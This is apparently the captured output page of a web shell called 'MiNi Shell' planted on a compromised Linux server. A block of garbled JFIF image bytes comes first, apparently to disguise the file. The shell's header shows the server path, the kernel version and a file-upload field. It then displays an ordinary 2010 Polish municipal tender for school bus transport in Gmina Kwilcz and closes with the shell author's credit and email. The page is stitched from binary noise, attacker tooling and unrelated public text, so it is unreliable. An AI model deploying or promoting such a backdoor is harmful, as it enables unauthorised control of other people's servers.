JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100624/164777-N-2010.html

<p class="kh_header"><b>Kwilcz: Świadczenie usług w zakresie dowozów i odwozów dzieci z terenu Gminy Kwilcz do szkół i oddziałów przedszkolnych w roku szkolnym 2010/2011 na podstawie  biletów miesięcznych</b><br>
<b>Numer ogłoszenia: 164777 - 2010; data zamieszczenia: 24.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kwilcz , ul. Kardynała Stefana Wyszyńskiego 23, 64-420 Kwilcz, woj. wielkopolskie, tel. 61 29 15 065, faks 61 29 15 264.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kwilcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie dowozów i odwozów dzieci z terenu Gminy Kwilcz do szkół i oddziałów przedszkolnych w roku szkolnym 2010/2011 na podstawie  biletów miesięcznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych w formie zakupu biletów miesięcznych dla dzieci podlegających obowiązkowi szkolnemu zamieszkałych na terenie Gminy Kwilcz na trasie z domu do szkoły i z powrotem  wraz z zapewnieniem tym uczniom opieki w czasie dowożenia - zgodnie z określonymi poniżej wymogami - we wszystkie dni funkcjonowania szkoły, która umożliwia dzieciom realizację obowiązku szkolnego i obowiązku nauki w roku szkolnym 2010/2011.
2. Wykonawca ma obowiązek uwzględnić następujące założenia:
a) dziecko powinno być dowiezione do szkoły (przedszkola), w takim czasie, aby mogło rozpocząć zajęcia lekcyjne zgodnie z planem i zabierane niezwłocznie po ich zakończeniu, bez zbędnego oczekiwania,
b), Wykonawca ma obowiązek ustalić w porozumieniu z Zamawiającym szczegółowe godziny kursów z dyrektorem szkoły, przedszkola i rodzicami - opiekunami uczniów (na podstawie tygodniowego planu lekcji uczniów). Wykonawca zapewni każdemu dziecku, na danej trasie, dowóz do szkoły (przedszkola) na czas, jak również powrót do domu niezwłocznie po zakończeniu zajęć lekcyjnych. Dziecko powinno przebywać w podróży jak najkrócej, nie dłużej jednak niż 1 godzinę
4. Zakres zamówienia:
Dowożeniem objęte są dzieci, które realizują obowiązek szkolny i obowiązek nauki w  Szkole Podstawowej w Luboszu im. Konstytucji 3 Maja w Luboszu 
( ul.Powstańców Wlkp 1, 64-423 Lubosz) , Zespole Szkół w Kwilczu ( ul.Kardynała Stefana Wyszyńskiego 20, 64-420 Kwilcz)  i Przedszkole pod Topolą w Kwilczu ( ul. Gumna 13) . 
Na dzień sporządzania SIWZ w roku szkolnym 2010/2011 do korzystania z dowozów uprawnionych jest 351 dzieci - bilety dwustronne.

 - Ilość dzieci  i tras w każdej chwili może ulec zmianie w zależności od decyzji rodziców  dotyczącej wyboru szkoły, w której dziecko będzie spełniać obowiązek szkolny lub nauki. 
- wykonawca zobowiązany jest zapewnić - niezależnie od  kierowcy - opiekuna przewożonym dzieciom.
Oferent będzie zobowiązany do pełnej dyspozycyjności, a w szczególności w przypadku awarii środka transportu do niezwłocznego zabezpieczenia innego pojazdu w czasie nie dłuższym niż 30 min. od chwili powiadomienia o zdarzeniu.

Powyższy opis zamówienia odnosi się zarówno dla zadania nr 1 jak i dla zadania nr 2, natomiast informacje szczegółowe zawarte są w rozdziale V odnoszącym się do Opisu części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca musi wykazać, że posiada licencję na wykonywanie krajowego transportu drogowego osób</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z załącznikiem do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie zadania nr 1 -  Wykonawca musi wykazać dysponowanie odpowiednim potencjałem technicznym w celu realizacji zamówienia, tj. przynajmniej jednym pojazdem który będzie wykonywał usługę opisaną w rozdziale V pkt 1, SIWZ o ilości miejsc siedzących nie mniej niż 46
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej ,
Wykonawca zobowiązany jest przedłożyć wraz z ofertą :
-wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia - wg załącznika Nr 5 do SIWZ wraz z informacją o podstawie dysponowania tymi zasobami.
w zakresie zadania nr 2 - 3.4. Wykonawca musi wykazać dysponowanie odpowiednim potencjałem technicznym w celu realizacji zamówienia, tj. przynajmniej dwoma  pojazdami którymi będzie wykonywał usługę opisaną w rozdziale V pkt 2, SIWZ o ilości miejsc siedzących - zarejestrowanych nie mniej niż 46 i jednym pojazdem o ilości miejsc siedzących - zarejestrowanych nie mniejszej niż 52.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej ,
Wykonawca zobowiązany jest przedłożyć wraz z ofertą :
wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia - wg załącznika Nr 5 do SIWZ wraz z informacją o podstawie dysponowania tymi zasobami</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie zadania nr 1 - Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia, tj. co najmniej  osobą posiadającą kwalifikacje i uprawnienia niezbędne do realizacji zamówienia, tj. posiadającą kwalifikacje i uprawnienia do kierowania pojazdami w wymaganej kategorii.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej,
Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 6 do SIWZ;
 - oświadczenie, że określone osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają posiadanie takich uprawnień - zgodnie z załącznikiem nr 6 do SIWZ.

w zakresie zadania nr 2 - 3.3	Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia, tj. co najmniej trzema  osobami posiadającymi  kwalifikacje i uprawnienia niezbędne do realizacji zamówienia, tj. posiadającą kwalifikacje i uprawnienia do kierowania pojazdami w wymaganej kategorii.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej,
Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
-	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 6 do SIWZ;
 - oświadczenie, że określone osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają posiadanie takich uprawnień - zgodnie z załącznikiem nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z załącznikiem do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje w następujących przypadkach możliwość zmiany umowy.
- zwiększenie lub zmniejszenie ilości przewożonych dzieci , 
 - wymiana pojazdów uczestniczących w wykonaniu zamówienia w przypadku gdy:
/Pojazd nie posiada ważnego badania technicznego,
/	Pojazd uległ uszkodzeniu w wyniku kolizji lub wypadku drogowego,
/	Pojazd uległ uszkodzeniu w przypadku wandalizmu,
/	Pojazd jest niesprawny,
 -  zmiany w zakresie osób, które będą uczestniczyły w wykonaniu zamówienia w przypadku:
/	Śmierci osoby
/	Dłuższej choroby ( więcej niż 30 dni) osoby wykonującej zamówienie
/	Utraty kwalifikacji niezbędnych do wykonania zamówienia
 -</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kwilcz.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kwilcz,
ul.Kard.St. Wyszyńskiego 23
64-420 Kwilcz, pokój nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2010 godzina 10:00, miejsce: Ofertę należy złożyć Zamawiającemu, Urząd Gminy Kwilcz ul. Kard. St.Wyszyńskiego 23 , 64-420   Kwilcz  pokój nr 14 , w terminie do dnia   6 lipca 2010roku, godz. 1000..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowozu i odwozu  uczniów z Gminy Kwilcz do Szkoły Podstawowej im. Konstytucji 3-go Maja w Luboszu, ul.Powstańców Wlkp1 w roku szkolnym 2010/2011 na podstawie  biletów miesięcznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do realizacji przedmiotu zamówienia, Wykonawca musi dysponować minimum jednym pojazdem o co najmniej 46 miejscach siedzących dla przewożonych dzieci (przywozy do szkoły i odwozy ze szkoły realizuje jeden pojazd).
Na dzień sporządzania SIWZ w roku szkolnym 2010/2011 do korzystania z dowozów uprawnionych jest 83 osoby
Zarówno ilość kilometrów, jak i ilość dzieci w każdej chwili może ulec zmianie w zależności od decyzji rodziców  dotyczącej wyboru szkoły, w której dziecko będzie spełniać obowiązek szkolny lub nauki oraz organizacji pracy szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowozu i odwozu   uczniów z Gminy Kwilcz do Zespołu Szkół w Kwilczu ( ul.Kardynała Stefana Wyszyńskiego 20, 64-420 Kwilcz)  i Przedszkola pod Topolą w Kwilczu ( ul. Gumna 13)  w roku szkolnym 2010/2011 na podstawie  biletów miesięcznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do realizacji przedmiotu zamówienia, Wykonawca musi dysponować minimum trzema pojazdami o min  46 miejscach siedzących - zarejestrowanych  dla przewożonych dzieci w zakresie przywozów i trzema pojazdami w zakresie odwozów, w tym dwa pojazdy o minimalnej liczbie miejsc siedzących - zarejestrowanych wynoszącej min. 46 -  i jeden pojazd o liczbie miejsc wynoszącej min  52 miejsca siedzące zarejestrowane. 

Na dzień sporządzania SIWZ w roku szkolnym 2010/2011 do korzystania z dowozów uprawnionych jest 240 dzieci uczęszczających do Zespołu Szkół w Kwilczu

Na dzień sporządzania SIWZ w roku szkolnym 2010/2011 do korzystania z dowozów uprawnionych jest 28 dzieci uczęszczających do Przedszkola Pod Topolą w Kwilczu, zgodnie z tabelą:.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com